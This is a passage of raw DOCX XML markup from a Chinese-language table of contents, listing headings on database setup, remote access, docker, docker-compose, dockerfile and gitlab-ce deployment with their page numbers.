          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779562" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>启动数据库服务器</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779562 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>93</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4CFFB47C" w14:textId="65F36F00" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779563" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>数据类型</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779563 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>93</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08BBE4A6" w14:textId="69261F81" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779564" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>数据库的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CURD</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779564 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>94</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B3F617D" w14:textId="7F6AA220" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779565" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>远程访问</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779565 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>94</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="398BC031" w14:textId="083E958D" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779566" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>docker+docker-compose+k8s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779566 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>94</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4158F217" w14:textId="76F767D4" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779567" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>换源</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779567 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>95</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0C4C317A" w14:textId="1636C792" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779568" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>dockerhub</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779568 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>95</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6212D5FB" w14:textId="51360D6D" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779569" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>上传到</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>hub</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779569 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>96</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="07A7F506" w14:textId="76290732" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779570" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>docker</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>操作和命令：搭建</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>gitlab-ce</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>为例</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779570 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>96</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="516F9DCD" w14:textId="77984C81" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779571" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>换源</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>增加</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>docker</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>下载地址</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779571 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>97</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4205AB46" w14:textId="74501D2F" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779572" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>docker run</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779572 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>98</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E88622F" w14:textId="7595B7EA" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779573" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>dockerfile</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779573 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>98</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="012BA967" w14:textId="5B9F224C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779574" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>docker-compose.yaml</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779574 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>98</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="030E7F81" w14:textId="55F8863B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779575" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>解决只能有</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>操作</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>docker</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>，普通用户无法操作</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>dockers</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779575 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>98</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E3E3C59" w14:textId="7D25C8C4" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779576" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>docker-compose</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>调试</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779576 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>99</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="149E086C" w14:textId="58364FF3" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779577" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>docker-compose</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>操作</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779577 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>99</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0DB5D98D" w14:textId="5DED7138" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779578" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>导出导入操作</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779578 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>99</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1467A02F" w14:textId="61EF31B7" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
